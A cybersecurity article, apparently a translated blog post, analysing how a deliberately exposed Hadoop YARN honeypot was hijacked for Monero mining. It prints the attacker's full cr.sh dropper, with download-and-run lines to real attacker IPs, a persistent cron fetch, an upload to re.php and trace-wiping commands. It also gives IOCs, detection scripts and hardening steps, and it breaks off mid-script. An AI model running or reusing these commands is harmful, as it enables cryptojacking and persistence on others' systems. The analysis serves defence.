NOTICE TO READERS: THIS ARTICLE IS INTENDED FOR CYBERSECURITY PROFESSIONALS.
DO NOT RESTORE THE PUBLISHED LINKS!
You do not realize the complexity of certain subjects until you run into them, and by then it is usually too late.
To help people understand what "cyber" means, over the last few nights I sat down at the computer and, for educational purposes, set up an unprotected HDFS environment1, in order to see what can happen when an environment is installed and configured without proper hardening or monitoring, or, the most common case, when the installation is performed by unskilled or careless technical staff.
What follows shows a security problem in the Hadoop YARN resource management system (unauthorized access to its REST APIs2) through which arbitrary code can be executed remotely. Once the infrastructure was built, I simply waited for events to unfold. After a week I found that the infrastructure had been attacked and compromised.
I then analyzed one of the compromises and will provide advice and security measures to address this problem.
The chosen case is one of cryptocurrency mining.
To begin, let's try to understand something more about the infrastructure used as a "honeypot3".
Hadoop is a distributed system infrastructure developed by the Apache Foundation. YARN is its unified resource management platform, whose primary role is the unified management and scheduling of cluster resources (it is generally used to manage data stored on a distributed file system). The MapReduce computation framework runs on top of it as an application program, and the resources underneath are managed by YARN. Simply put, a user can submit specific application programs to YARN for execution, and those programs may include the execution of system commands.
YARN exposes REST APIs, which by default listen on ports 8088 and 8090; through these APIs any user can submit jobs and perform other operations directly. If the cluster is configured incorrectly, the REST APIs end up exposed on the public network (for example on the Internet, if you decide to run an HDFS cluster in the cloud) and allow unauthorized access to the system. Ultimately, the bad configuration lets any attacker use the infrastructure to execute remote commands, in order to carry out mining4 or other malicious activity on the system.
Why is this kind of activity so subtle?
Because it is difficult to add security controls to HDFS clusters, to enable Kerberos authentication to prevent anonymous access (which may require upgrading versions), or to monitor them: these systems are built to maximize the performance of queries and analytics that are already computationally expensive.
Steps of the malicious activity found
- Intrusion analysis
On the machine used as bait, Hadoop YARN was installed and configured in default mode; this in itself creates an unauthorized-access problem. The intruder directly uses the REST API open on port 8088, after a crawler5 specifically identifies a set of open ports pre-configured by the operator. At this point the intruder can send execution commands to download and run a .sh script6 on the server (attachment 1 contains the whole script found, cr.sh). Further downloads then start the mining process.
The whole process is relatively simple and well structured; reading the script shows that nothing is left to chance, for example the checks performed on the guest Hadoop server.
The command found and executed is interesting:
exec /bin/bash -c "curl 185.222.210.59/cr.sh | sh & disown"
I dwell on this command to highlight two very important aspects: the IP address from which the script is downloaded, and some activities that serve to mask the malicious activity7.
Continuing the analysis of the code in the cr.sh script, it is easy to notice that its author paid particular attention to eliminating the traces of the performed activities8.
In summary, the whole script is very detailed; every function is nested and called and many files are involved in the process, so the main steps can be reported in the following order:
- Clean up related crontab entries, files and processes;
- Determine and download the mining program, checking its MD5 value at the same time; in addition to the primary server, https: // transfer.sh is used to provide a backup download;
- Add the download of the script to crontab.
The main indicators that emerged from the analysis are the following:
- 185.222.210.59;
- cr.sh;
- MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242;
- http:// 185.222.210.59/re.php;
- xmrig_64 or xmrig_32.
We will check the indicators above with an OSINF cycle9.
- 185.222.210.59
We try to verify the origin of this IP address. The main fields are shown in the figure below:
In some forums10 of vendors/companies that release HDFS-based platforms, the IP address and the exact string found in our script are reported by users asking for explanations; in some cases they ask whether it is a standard configuration. All this thanks to HDFS administrators who perform manual, aperiodic checks: there is no automation.
Checking how the server operates, you get the following:
OS | Debian
Protocols | 80/HTTP and 22/SSH
- 80/HTTP (GET /)
Server & Hosting | Apache httpd 2.4.10
Status Line | 200 OK
Page Title | Apache2 Debian Default Page: It works
- 22/SSH (SSHv2 Handshake)
Server & Hosting | OpenSSH 6.7p1
Banner | SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
Host Key Algorithm | ecdsa-sha2-nistp256
Host Key Fingerprint | 5a5c81f8dbc3e3d9fc57557691912a75b3be0d42ea5b30a2e7f1e584cffc5f40
Negotiated Key Exchange | curve25519-sha256@libssh.org
Negotiated Symmetric Cipher | aes128-ctr | aes128-ctr
Negotiated MAC | hmac-sha2-256 | hmac-sha2-256
It has also been verified that port 111 is open, which corresponds to the portmap service. So on the server side the portmapper listens on port 111; on the client side there are a number of programs that, for any RPC service11, must first contact the remote portmapper, which provides them with the information needed to establish a connection with the responsible daemon. A possible vulnerability in this service could also be verified, but it is not the object of this research and analysis.
So the server in question is "connected" and probably maintained via port 22 with the SSH protocol, which guarantees an encrypted connection. From the field 22.ssh.v2.server_host_key.fingerprint_sha256, i.e. the fingerprint of the server's SSH host key, searches show that there are no other servers with the same key.
It is also noted that the field 80.http.get.headers.last_modified shows the date Wed, 16 May 2018 14:58:53 GMT.
The server belongs to the address space of the company PRISM BUSINESS SERVICES LTD, which from its main site http: // www. prismbusiness.co.uk/about-us/ appears to have nothing to do with the ICT sector, but operates in other fields. If they have active servers in a cloud context, perhaps configured and/or managed only when needed, they may be unaware of their current use.
Their entire network range is shown below:
There is no DNS resolution for the analyzed IP.
- cr.sh
The cr.sh script that was analyzed has MD5 48e79f8de26fa56d955a28c2de493132; however, there is no evidence of it being indexed on the Internet.
- MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242
The MD5s reported correspond to the files downloaded during execution of the script and are shown in the table below:
File name | MD5
xmrig_64 | c8c1f2da51fbd0aea60e11a81236c9dc
xmrig_32 | 5110222de7330a371c83af67d46c4242
The files shown above are the core of the execution of the Proof of Work (PoW) of a well-known cryptocurrency: Monero.
- https:// transfer.sh/ixQBE/zzz
The use of transfer.sh is interesting: it is one of the Tactics, Techniques and Procedures (TTPs) of this intruder, who uses it as a backup source for downloading the mining executables.
In fact, transfer.sh is nothing more than "easy and fast file sharing from the command line. This code contains the server with everything you need to create your own instance", all available for download at https: // github.com/dutchcoders/transfer.sh and on the website https: // transfer.sh/, where usage explanations and use cases make it easy to integrate and configure. Code reuse is nowadays widespread both in cyber crime and in much wider contexts such as cyber espionage or cyber intelligence.
- http:// 185.222.210.59/g.php
Today, 02 June 2018, the page responds with the IP address 95.142.40.81, while at the time the script was discovered the IP address shown was 46.30.42.162. Both behave the same way: stored in the f1 variable, after the checks made with getconf LONG_BIT, the xmrig_64 or xmrig_32 executables are downloaded. Obviously this means that, if the first IP address is flagged as malicious but the control and management IP 185.222.210.59 is not, some security controls become useless, such as firewall blacklists, non-granular Websense categorizations, or SIEM alerts available to a SOC.
Let's see if we can derive something from the two IP addresses:
- 46.30.42.162
The address belongs to Eurobyte VPS, and the addressing is a /24 block belonging to this hosting provider, which is of Russian origin.
This server, too, has ports 22 and 80 open, with a Debian operating system.
Below are the details found:
OS | Debian
Network | MCHOST-AS (RU)
Routing | 46.30.42.0/24 via AS7018, AS3356, AS35415, AS48282
Protocols | 80/HTTP and 22/SSH
- 80/HTTP (GET /)
Server & Hosting | Apache httpd 2.4.10
Status Line | 200 OK
Page Title | Apache2 Debian Default Page: It works
- 22/SSH (SSHv2 Handshake)
Server & Hosting | OpenSSH 6.7p1
Banner | SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
Host Key Algorithm | ecdsa-sha2-nistp256
Host Key Fingerprint | 3e88599d935de492c07f93e313201aa340b7ff0a5f66a330a0c5ab660cf95fad
Negotiated Key Exchange | curve25519-sha256@libssh.org
Negotiated Symmetric Cipher | aes128-ctr | aes128-ctr
Negotiated MAC | hmac-sha2-256 | hmac-sha2-256
A search based on the host key fingerprint shows that 41 other servers have the same signature. Among these 41 servers is the new IP address 95.142.40.81, also in the availability of the intruder.
With this data we can reasonably assume that we have found a first-level pool of infrastructure belonging to this single intruder or cyber crime group.
The addressing and any information useful for subsequent activities are reported:
These are the metadata concerning the analysis of the 41 IP addresses above:
All the addresses found refer to AS MCHOST-AS, RU:
1-th Street Frezernaiy, 2 / 1 XENUMX strokes
109202 Moscow
RUSSIAN FEDERATION
phone: + 7 495 6738456
fax: + 7 495 6738456
e-mail: info (at) mchost (dot) ru
Areas serviced: RU
- http:// 185.222.210.59/w.conf
Today:
{
"algo": "cryptonight",
"background": true,
"colors": false,
"retries": 5,
"retry-pause": 5,
"donate-level": 1,
"syslog": false,
"log-file": null,
"print-time": 60,
"av": 0,
"safe": false,
"max-cpu-usage": 95,
"cpu-priority": 4,
"threads": null,
"pools": [
{
"url": "stratum + tcp: // 46.30.43.159: 80",
"user": "h",
"pass": "h",
"keepalive": true,
"nicehash": false,
"variant": -1
}
],
"api": {
"port": 0,
"access-token": null,
"worker-id": null
}
}
At the time of the discovery of the script:
{
"algo": "cryptonight",
"background": true,
"colors": false,
"retries": 5,
"retry-pause": 5,
"donate-level": 1,
"syslog": false,
"log-file": null,
"print-time": 60,
"av": 0,
"safe": false,
"max-cpu-usage": 95,
"cpu-priority": 4,
"threads": null,
"pools": [
{
"url": "stratum + tcp: // 179.60.146.10: 5556",
"user": "h",
"pass": "h",
"keepalive": true,
"nicehash": false,
"variant": -1
},
{
"url": "stratum + tcp: // 46.30.43.159: 80",
"user": "h",
"pass": "h",
"keepalive": true,
"nicehash": false,
"variant": -1
}
],
"api": {
"port": 0,
"access-token": null,
"worker-id": null
}
}
It is important to underline how the conf file defines two important indicators for the analysis phase (we could also say three):
- stratum + tcp: // 46.30.43.159: 80 (in common on the different dates);
- stratum + tcp: // 179.60.146.10: 5556 (only in the first find);
- "algo": "cryptonight".
Let's first analyze the IP in common, 46.30.43.159. This IP address, belonging to Eurobyte VPS (Russia), has PTR vz230703.eurodir.ru and is part of the 46.30.43.0/24 network. The PTRs of the IPs in this network (attachment 1 shows the whole class) have something in common. I report in the table below the PTRs with similar names and without an A record; there are 41:
Also in this case, the provider may not be aware that some of the servers in its availability are used for third-party purposes; however, they should be analyzed one by one to find further similarities.
Analyzing 179.60.146.10 instead, we have the following:
ECDSA key fingerprint is SHA256:62Jyi3X1dEJRIH85kJ0Ee20aW+PEK5g976Xk3yGKVHQ
Ports 22, 111 and 5555 are open, and this server too uses OpenSSH version 6.7p1 Debian 5+deb8u3.
Unfortunately there is no other evidence.
Cryptonight, instead, is a strong indicator of what the attacker wants to do once the target is hit: specifically, to mine blocks of the Monero cryptocurrency, enrolling the target in a pool available to the intruder. The choice is not random. The Cryptonight algorithm was designed to be used by miners who do not have ASICs or clusters of very expensive graphics cards, using instead the ordinary CPUs of PCs, notebooks or mini PCs.
Indeed, CryptoNight is used for mining the coins based on the CryptoNote protocol. It is a strictly memory-bound function (memory-hard hash), in this case bound to the CPU's third-level cache, since it is focused on latency. This constraint was imposed to make CryptoNight inefficient on systems such as GPUs and FPGAs, which lack such cache memory and are therefore at a disadvantage in running the algorithm.
The CryptoNight scratchpad is about 2 MB of memory per instance, for the following reasons:
- it fits in the L3 (per core) cache of modern processors;
- an internal memory of a megabyte is an unacceptable size for the traditional ASIC pipeline;
- GPUs can run hundreds of threads, but they have much worse latency than the L3 cache of modern CPUs;
- a significant expansion of the scratchpad would require an increase in iterations. If a node spent a considerable amount of time hashing a block, it could easily be flooded with false blocks, causing a DDoS.
Update
Just in these days there has been a modification of the cr.sh script, of the configuration files and of the executables.
The mining executables are now downloaded from IP address 95.142.40.83, which, via the SSH key fingerprint, led to identifying additional IP addresses available to the intruder.
The table below shows details for 20 of the 65 IP addresses with the same SSH keys and the same configuration, since it was not possible to retrieve them all in bulk (lack of time and no paid account available).
Here are some detailed graphs:
In addition, the downloadable files are now the following:
File name | MD5
xm64 | 183664ceb9c4d7179d5345249f1ee0c4
xm32 | b00f4bbd82d2f5ec7c8152625684f853
In addition to the above, the script contains the following commands:
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf /tmp/pscd*
rm -rf /var/tmp/pscd*
crontab -l | sed '/192.99.142.232/d' | crontab -
crontab -l | sed '/192.99.142.226/d' | crontab -
crontab -l | sed '/192.99.142.248/d' | crontab -
crontab -l | sed '/logo4/d' | crontab -
crontab -l | sed '/logo9/d' | crontab -
crontab -l | sed '/logo0/d' | crontab -
The use of the sed command, which is not frequent in this kind of script, is immediately evident, so it too could be counted among the TTPs used by the hostile actor.
Sed is a stream editor, used to perform text transformations on an input stream (a file or input from a pipeline); it is sed's ability to filter text in a pipeline that particularly distinguishes it from other editors.
In this context it is used to remove any trace of cron activity. Probably there are intrusion activities unknown to this analysis, deriving from past activities that were then changed to obtain what was expected.
Analyzing the IP addresses 192.99.142.232, 192.99.142.226 and 192.99.142.248, the reference company (ISP) is OVH Hosting, located in Canada.
All have port 22 (SSH) open. If they are considered malicious IP addresses, for example referring to what is reported at https://www. joesandbox.com/index.php/analysis/49178/0/executive, where the use of PowerShell is declared, enriching the search we find that IP address 192.99.142.232 has the same fingerprint as IP 85.214.102.143, located in Germany in the availability of the ISP Strato AG. That address also has a certificate (443.https.tls.certificate.parsed.fingerprint_sha1: 78e477a2406935666a2eac4e44646d2ffe0a6d9b) which further links it to the following IPs: 85.214.125.15 (emma.smartmessaging.com), Debian OS, and 85.214.60.153 (busware.de), Debian OS.
From | To (SSH fingerprint) | To (TLS fingerprint)
192.99.142.232 | 85.214.102.143 | 85.214.125.15, 85.214.60.153
As for IP 192.99.142.248, refer to the figure below, which summarizes what has been described so far in the document.
There are no significant details for the other IP address, 192.99.142.226.
Security advice
- Use top to see the processes and kill the anomalous process.
- Check the directories /tmp and /var/tmp and delete files such as java, ppc, ppl3, config.json and w.conf.
- Check the crontab list and remove anomalies.
- Analyze the YARN logs, confirm the anomalous application, and remove the job.
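The checks above can be run over output saved from the host rather than by eye. The following Python script is an added example and not code from the original article: it takes `ps aux`, a one-per-line listing of /tmp and /var/tmp, and `crontab -l` output as text and reports the lines matching the indicators named in this article (process names, file names, download hosts and pools, and the "curl ... | sh" cron pattern); the sample inputs at the bottom are constructed.

```python
import re
from typing import Dict, List

# Process names and command fragments the cr.sh script kills or starts.
PROCESS_INDICATORS = ("xmrig", "xmr-stak", "cryptonight", "sustes", "suppoie",
                      "xmrig_64", "xmrig_32", "xm64", "xm32")

# File names the article lists for /tmp and /var/tmp, plus the downloaded binaries.
FILE_INDICATORS = ("java", "ppc", "ppl3", "config.json", "w.conf", "c.conf",
                   "cr.sh", "xmrig_64", "xmrig_32", "xm64", "xm32")

# Download hosts and pool addresses reported in the article.
NETWORK_INDICATORS = ("185.222.210.59", "46.30.43.159", "179.60.146.10",
                      "95.142.40.83", "95.142.40.81", "46.30.42.162",
                      "192.99.142.248", "192.99.142.232", "192.99.142.226",
                      "transfer.sh")

# A cron entry that pipes a download straight into a shell is the
# persistence pattern used by cr.sh, whatever host it points at.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")


def suspicious_processes(ps_output: str) -> List[str]:
    """Return `ps aux` lines whose COMMAND column matches an indicator."""
    hits = []
    for line in ps_output.splitlines()[1:]:        # first line is the header
        fields = line.split(None, 10)              # 11 columns; the last is COMMAND
        if len(fields) < 11:
            continue
        command = fields[10]
        if any(ind in command for ind in PROCESS_INDICATORS + NETWORK_INDICATORS):
            hits.append(line.strip())
    return hits


def suspicious_files(listing: str) -> List[str]:
    """Return paths from a one-per-line listing of /tmp and /var/tmp to inspect."""
    hits = []
    for raw in listing.splitlines():
        path = raw.strip()
        name = path.rsplit("/", 1)[-1]
        # cr.sh removes /tmp/pscd* and /var/tmp/pscd*, so those names matter too.
        if name and (name in FILE_INDICATORS or name.startswith("pscd")):
            hits.append(path)
    return hits


def suspicious_cron(crontab_output: str) -> List[str]:
    """Return crontab entries that download-and-execute or reference a known host."""
    hits = []
    for line in crontab_output.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        if PIPE_TO_SHELL.search(entry) or any(ind in entry for ind in NETWORK_INDICATORS):
            hits.append(entry)
    return hits


def triage(ps_output: str, listing: str, crontab_output: str) -> Dict[str, List[str]]:
    """Run all three checks and group the findings by source."""
    return {
        "processes": suspicious_processes(ps_output),
        "files": suspicious_files(listing),
        "cron": suspicious_cron(crontab_output),
    }


# Constructed sample output, shaped like a compromised NodeManager host.
SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
yarn 1201 0.3 2.1 3051234 88120 ? Sl 10:01 0:12 /usr/lib/jvm/java-8/bin/java -Dproc_nodemanager
yarn 2419 98.7 0.9 241232 41000 ? Sl 10:05 55:01 /tmp/xmrig_64 -c /tmp/w.conf
root 2600 0.0 0.0 12345 1200 ? S 10:06 0:00 sshd: root@pts/0
"""

SAMPLE_LISTING = """\
/tmp/hsperfdata_yarn
/tmp/w.conf
/tmp/xmrig_64
/var/tmp/pscd1234
/var/tmp/java
"""

SAMPLE_CRON = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl 185.222.210.59/cr.sh | sh
*/15 * * * * wget -q -O - http://example.invalid/x.sh | bash
"""

if __name__ == "__main__":
    for source, lines in triage(SAMPLE_PS, SAMPLE_LISTING, SAMPLE_CRON).items():
        for hit in lines:
            print(f"[{source}] {hit}")
```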
Security reinforcement
- Configure access policies via iptables or security groups to restrict access to ports such as 8088;
- if not necessary, do not expose the interface on the public network; limit it to local or intranet calls;
- update Hadoop to 2.x and enable Kerberos authentication to prevent anonymous access.
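A quick way to confirm that the last two points have actually been applied is to audit core-site.xml and yarn-site.xml for the settings that leave the ResourceManager web UI and REST API anonymous. The Python below is an added example, not code from the article or from the Hadoop project; the property names are the standard Hadoop ones, and the weak and hardened configurations embedded at the bottom are constructed, with 10.0.0.5 standing in for an internal address.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Values these properties must have once Kerberos is enabled and the
# ResourceManager web UI / REST endpoints stop accepting anonymous callers.
EXPECTED = {
    "hadoop.security.authentication": "kerberos",
    "hadoop.security.authorization": "true",
    "hadoop.http.authentication.type": "kerberos",
    "hadoop.http.authentication.simple.anonymous.allowed": "false",
    "yarn.acl.enable": "true",
}

# What Hadoop assumes when a property is absent: the insecure default install.
DEFAULTS = {
    "hadoop.security.authentication": "simple",
    "hadoop.security.authorization": "false",
    "hadoop.http.authentication.type": "simple",
    "hadoop.http.authentication.simple.anonymous.allowed": "true",
    "hadoop.http.filter.initializers": "org.apache.hadoop.http.lib.StaticUserWebFilter",
    "yarn.acl.enable": "false",
    "yarn.resourcemanager.webapp.address": "0.0.0.0:8088",
}

# hadoop.http.authentication.* only takes effect when this filter is installed.
AUTH_FILTER = "org.apache.hadoop.security.AuthenticationFilterInitializer"


def parse_hadoop_config(xml_text: str) -> Dict[str, str]:
    """Turn a Hadoop <configuration> file into a name -> value dict."""
    props = {}
    for prop in ET.fromstring(xml_text).findall("property"):
        name = prop.findtext("name")
        if name:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def audit(core_site_xml: str, yarn_site_xml: str) -> List[str]:
    """Return one finding per weak setting; an empty list means the checks pass."""
    cfg = dict(DEFAULTS)
    cfg.update(parse_hadoop_config(core_site_xml))
    cfg.update(parse_hadoop_config(yarn_site_xml))
    findings = []
    for name, want in EXPECTED.items():
        got = cfg[name].lower()
        if got != want:
            findings.append(f"{name} is {got!r}, expected {want!r}")
    if AUTH_FILTER not in cfg["hadoop.http.filter.initializers"]:
        findings.append("hadoop.http.filter.initializers does not include " + AUTH_FILTER)
    # Bound to every interface, port 8088 ends up reachable from the public
    # network on any node that has a public address.
    host = cfg["yarn.resourcemanager.webapp.address"].rsplit(":", 1)[0]
    if host in ("", "0.0.0.0", "::"):
        findings.append("yarn.resourcemanager.webapp.address listens on all interfaces")
    return findings


# Constructed: a default-style install like the honeypot described above.
WEAK_CORE_SITE = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:9000</value></property>
</configuration>"""
WEAK_YARN_SITE = """<configuration>
  <property><name>yarn.nodemanager.aux-services</name><value>mapreduce_shuffle</value></property>
</configuration>"""

# Constructed: the same cluster after applying the reinforcement advice.
HARDENED_CORE_SITE = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:9000</value></property>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.security.authorization</name><value>true</value></property>
  <property><name>hadoop.http.filter.initializers</name>
    <value>org.apache.hadoop.security.AuthenticationFilterInitializer</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.simple.anonymous.allowed</name><value>false</value></property>
</configuration>"""
HARDENED_YARN_SITE = """<configuration>
  <property><name>yarn.nodemanager.aux-services</name><value>mapreduce_shuffle</value></property>
  <property><name>yarn.acl.enable</name><value>true</value></property>
  <property><name>yarn.admin.acl</name><value>hadoop</value></property>
  <property><name>yarn.resourcemanager.webapp.address</name><value>10.0.0.5:8088</value></property>
</configuration>"""

if __name__ == "__main__":
    for label, core, yarn in (("weak", WEAK_CORE_SITE, WEAK_YARN_SITE),
                              ("hardened", HARDENED_CORE_SITE, HARDENED_YARN_SITE)):
        print(f"{label}: {audit(core, yarn) or ['ok']}")
```

Restricting port 8088 with iptables or a security group, as the first point advises, still applies on top of this: the audit only covers what the cluster configuration itself can enforce.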
IOC
Wallet address
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
MD5
- MD5 (xmrig_64) = c8c1f2da51fbd0aea60e11a81236c9dc
- MD5 (xmrig_32) = 5110222de7330a371c83af67d46c4242
- MD5 (xm64) = 183664ceb9c4d7179d5345249f1ee0c4
- MD5 (xm32) = b00f4bbd82d2f5ec7c8152625684f853
- MD5 (cr.sh) = 1e8c570de8acc2b7e864447c26c59b32
- MD5 (cr.sh) = 48e79f8de26fa56d955a28c2de493132
- MD5 (w.conf) = 777b79f6ae692d8047bcdee2c1af0fd6
- MD5 (c.conf) = 9431791f1dfe856502dcd58f47ce5829
Addresses in order of priority
- 185.222.210.59 (appears to be the source IP);
- 46.30.43.159 (connection to the intruder's pool, stratum+tcp protocol);
- 179.60.146.10 (connection to the intruder's pool, stratum+tcp protocol);
- 95.142.40.83 (download of the mining files);
- 95.142.40.81 (download of the mining files);
- 46.30.42.162 (download of the mining files);
- 192.99.142.248 (connected to evasion activities);
- 192.99.142.232 (connected to evasion activities);
- 192.99.142.226 (connected to evasion activities);
- 85.214.102.143 (fingerprint in common with the addresses above);
- 85.214.125.15 (fingerprint in common with the addresses above);
- 85.214.60.153 (fingerprint in common with the addresses above).
Addresses suspected of belonging to the intruder's availability
Conclusions
For those who have reached the end, it is worth concluding by underlining that standard operating systems such as Ubuntu and Windows 7 were used.
The entire process has also been replicated on the operating systems mentioned above with a positive outcome, and it could also be assumed to work on IoT devices.
I think it is very complicated to interrupt or even notice a similar threat if it targets IoT devices, given the lack of knowledge of the underlying systems, the lack of security, and above all the scarce security tooling we have to manage the daily use of IoT.
Unfortunately I have not carried out any tests on IoT devices, so I cannot say with certainty that the whole process described would work there.
I would like to conclude with a provocation, underlining another aspect of the use of cryptominers. It cannot be excluded that cyber crime uses cryptominers to fund much more sophisticated malware campaigns, such as those of the APTs12, including those of parastatal origin, considering the possibility of self-financing with the approval of the government for which the "hacker" group works or with which it collaborates. The complete anonymity of operations in the cyber domain allows high margins of deception, making such activities particularly profitable from a market point of view, through the ability to easily run false flag operations and to "direct" attribution towards unrelated third parties.
Finally, a last consideration on the difficulty of performing these analyses. The difficulty readers may have had in reading this analysis mirrors the difficulty of executing it; but if you want to play a non-marginal role on the cyber chessboard, it is essential to have prepared and aware people, able to analyze and implement the needed remedies on real systems, generally much more complex than the one I created for educational purposes.
1 HDFS: HDFS refers to the Hadoop Distributed File System. It is an open-source file system that supports a hierarchical system of files and directories distributed across the storage nodes managed by Hadoop. To learn more: https: // www. zerounoweb.it/techtarget/searchdatacenter/hadoop-significa-rendere-piu-economico-il-big-data-management-ecco-come/
2 REST API: REpresentational State Transfer Application Programming Interface. Broadly, these are indications from the code's developer that determine how the data used by the application should be transmitted.
3 In general, something created specifically to attract an attacker is called a honeypot; in practice it is a trap designed to reveal an attacker.
4 The term mining generally refers to the execution of complex calculations in order to create cryptocurrency.
5 A crawler is software that automatically scans a network for vulnerabilities.
6 A script is nothing more than a file containing a sequence of commands.
7 In particular, you can clearly see how a script called cr.sh is downloaded from the IP address 185.222.210.59 and run with the command sh & disown, that is, the process runs within the current bash instance of the terminal, in the background, but is detached from bash's job list (i.e. the process is not listed as a foreground/background bash job); the disown command is therefore used to delete/remove jobs or to tell the shell not to send a HUP signal.
8 pkill -f cryptonight
pkill -f sustes
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
#ps ax | grep /tmp/yarn | grep -v grep | xargs kill -9
This part of the code mainly deals with existing mining processes: the files to be cleaned up and the processes to be killed. However, it immediately gives us an important clue: cryptonight (which we will come back to later).
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
    WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
    WGET="wget -O";
fi
f2="185.222.210.59"
This second part checks and assigns some variables: it determines whether the curl and wget commands exist and, if so, assigns them to the WGET variable; f2 is assigned an IP address.
In fact, f2 is one of the servers used to download files related to the malicious activity in progress.
downloadIfNeed()
{
    if [ ! -f /tmp/java ]; then
        echo "File not found!"
        download
    fi
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum /tmp/java | awk '{print $1}')
        echo $sum
        case $sum in
        c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242)
            echo "Java OK"
            ;;
        *)
            echo "Java wrong"
            sizeBefore=$(du /tmp/java)
            if [ -s /usr/bin/curl ];
            then
                WGET="curl -k -o";
            fi
            if [ -s /usr/bin/wget ];
            then
                WGET="wget --no-check-certificate -O";
            fi
            $WGET /tmp/java https: // transfer.sh/ixQBE/zzz
            sumAfter=$(md5sum /tmp/java | awk '{print $1}')
            if [ -s /usr/bin/curl ];
            then
                echo "redownloaded $sum $sizeBefore after $sumAfter" `du /tmp/java` > /tmp/tmp.txt
                curl -F "file=@/tmp/tmp.txt" http: //$f2/re.php
            fi
            ;;
        esac
    else
        echo "No md5sum"
        download
    fi
}
download() {
    f1=$(curl 185.222.210.59 / g.php)
    if [ -z "$f1" ];
    then
        f1=$(wget -q -O - 185.222.210.59 / g.php)
    fi
    if [ `getconf LONG_BIT` = "64" ]
    then
        $WGET /tmp/java http: // $f1/xmrig_64
    else
        $WGET /tmp/java http: // $f1/xmrig_32
    fi
}
if [ ! "$(ps -fe | grep '/tmp/java -c /tmp/w.conf' | grep -v grep)" ];
then
    downloadIfNeed
    chmod +x /tmp/java
    $WGET /tmp/w.conf http: //$f2/w.conf
    nohup /tmp/java -c /tmp/w.conf > /dev/null 2>&1 &
    sleep 5
    rm -rf /tmp/w.conf
else
    echo "Running"
fi
if crontab -l | grep -q "185.222.210.59"
then
    echo "Cron exists"
else
    echo "Cron not found"
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];
    then
        LDR="curl";
    fi
    if [ -s /usr/bin/wget ];
    then
        LDR="wget -q -O -";
    fi
    (crontab -l 2>/dev/null; echo "*/2 * * * * $LDR http: // 185.222.210.59/cr.sh | sh > /dev/null 2>&1") | crontab -
fi
This third part of the code first determines whether /tmp/java exists and is writable, then checks whether its MD5 matches one of the MD5 values present in the code (we will see the two file hashes later). In the script the LDR variable is assigned; it is used mainly to download the mining programs and other files, using wget or curl depending on which command is present on the host. This part is the core of the script: if necessary (via the downloadIfNeed function) it downloads into the /tmp directory, renamed java, the executable for the mining (checking with getconf LONG_BIT whether the 32- or 64-bit build is needed), downloads the configuration file w.conf, adds execute permission to the mining program and then runs it in the background with nohup (nohup is a command that ignores the SIGHUP signal, allowing execution to continue even after a disconnection from the terminal or the termination of the terminal emulator).
It then deletes the configuration file and checks the tasks in crontab: if no matching task is present, it adds the task "*/2 * * * * $LDR http: // 185.222.210.59/cr .sh | sh > /dev/null 2>&1", where $LDR is wget -q -O - or curl (also mentioned above); the task runs once every two minutes (as shown in the figure, which illustrates the fields that specify how often the command is executed).
The script contains download methods with several nested calls. The entry point is downloadIfNeed. More precisely, the main job of this method is to check the MD5 of the existing mining program; if it cannot be verified, or the file does not exist, it directly calls the download method (defined in the script) to download the mining program. If the file exists but the MD5 does not match, it calls the download method again. If the check fails once more, it tries to download the mining program from another download channel, https: // transfer.sh/WoGXx/zzz, and verifies it again. Finally, the relevant results are reported to re.php on the target server $f2.
If it exists, the copy is named java.
The download() method determines which version of the mining program the system downloads from the following web resource: http: // 185.222.210.59/g.php.
The resource returns another IP address from which the main executable is downloaded; once the download is complete, it is checked again and the copy is renamed ppc.
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
crontab -l | sed '/logo4/d' | crontab -
crontab -l | sed '/logo9/d' | crontab -
crontab -l | sed '/logo0/d' | crontab -
In the last part of the script there is some cleanup of processes, files and crontab: pkill is used to terminate the processes matching the conditions, and some crontab entries are removed.
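The indicators the analysis above extracts from cr.sh (a cron task that pipes a curl/wget download into sh every two minutes, a miner started as /tmp/java -c /tmp/w.conf, the miner names it kills, and the two MD5 sums it accepts) can be turned into a quick host triage check. The following is an added example written for this article, not code from the original page or from cr.sh; the IP address, process listing and crontab content it uses are constructed sample data.

```sh
#!/bin/sh
# Added triage example, not part of the original article or of cr.sh.
# It checks crontab text and a `ps -fe` listing for the indicators the
# analysis describes: a cron task that pipes a curl/wget download to sh,
# a binary run from /tmp with a -c config, the process names cr.sh itself
# kills, and the two MD5 values cr.sh accepts for /tmp/java.
# All sample input below is constructed for this example.

# Exit 0 if stdin (output of `crontab -l`) has a non-comment task that
# downloads with curl or wget and pipes the result straight into a shell.
suspicious_cron() {
    grep -Eq '^[^#]*(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]>;&]|$)'
}

# Print (and exit 0 on) lines of stdin (output of `ps -fe`) that show a
# binary run from /tmp with a -c config, or a miner name from the kill list.
suspicious_procs() {
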